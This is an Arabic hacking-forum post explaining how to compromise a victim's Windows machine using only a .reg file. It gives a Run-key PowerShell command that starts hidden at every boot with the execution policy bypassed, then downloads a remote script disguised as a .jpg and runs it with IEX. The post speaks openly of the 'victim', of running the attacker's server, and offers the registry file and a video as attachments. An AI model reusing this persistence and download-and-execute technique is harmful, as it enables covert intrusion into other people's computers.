25.05.2017 الاختراق بملف ريجيستري فقط -PowerShell- Clean All


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,821
3,865
1
نزلت موضوع من شوي ومحيته
لانني كنت مكبر القصة ومابدها كل هالشي
اقتباس موضوعي السابق باخر الموضوع بس رح اشرح التعديل قبل
التعديل اللي صار مافي داعي نكتب بمسار الريجيستري الخاص بفتح سكربت الباور شيل
" اقرا تحت وانت تفهم القصة"
فقط منضيف قيمة جديدة بالريجيستري بمفتاح جديد ببدء الشغيل ومحتواها التالي
C#:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-ExecutionPolicy Bypass -windowstyle hidden -noexit -command IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.1/devpoint.jpg'); hackbacktrack"
او اي امر من اوامر الباور شيل انت تريده
ممكن تعمل داونلودر لملف وممكن تسوي اي شي من اوامر الباور شيل
وبعد اعادة التشغيل رح يشتغل سيرفرك
هذا ماقمت بعمله فقط استغنينا عن فكرة التعديل على مسار الريجيستري الخاص بفتح سكربتات الباور شيل
وعملنا مفتاح جديد بالريجيستري ببدء التشغيل مهمته انه يشغل الباور شيل ومعها الامر اللي نريده
عند كل بدء تشغيل
وكل هذا فقط من خلال ملف ريجيستري بدون اي برمجة
الضحية ان فتح بالنوت باد .؟ الجواب معروف
هذا للي بده يخترق فقط من خلال ملف ريجيتستري بدون اي شي اخر
لتحميل ملف الريجيستري والفديو من المرفقات​
 

المرفقات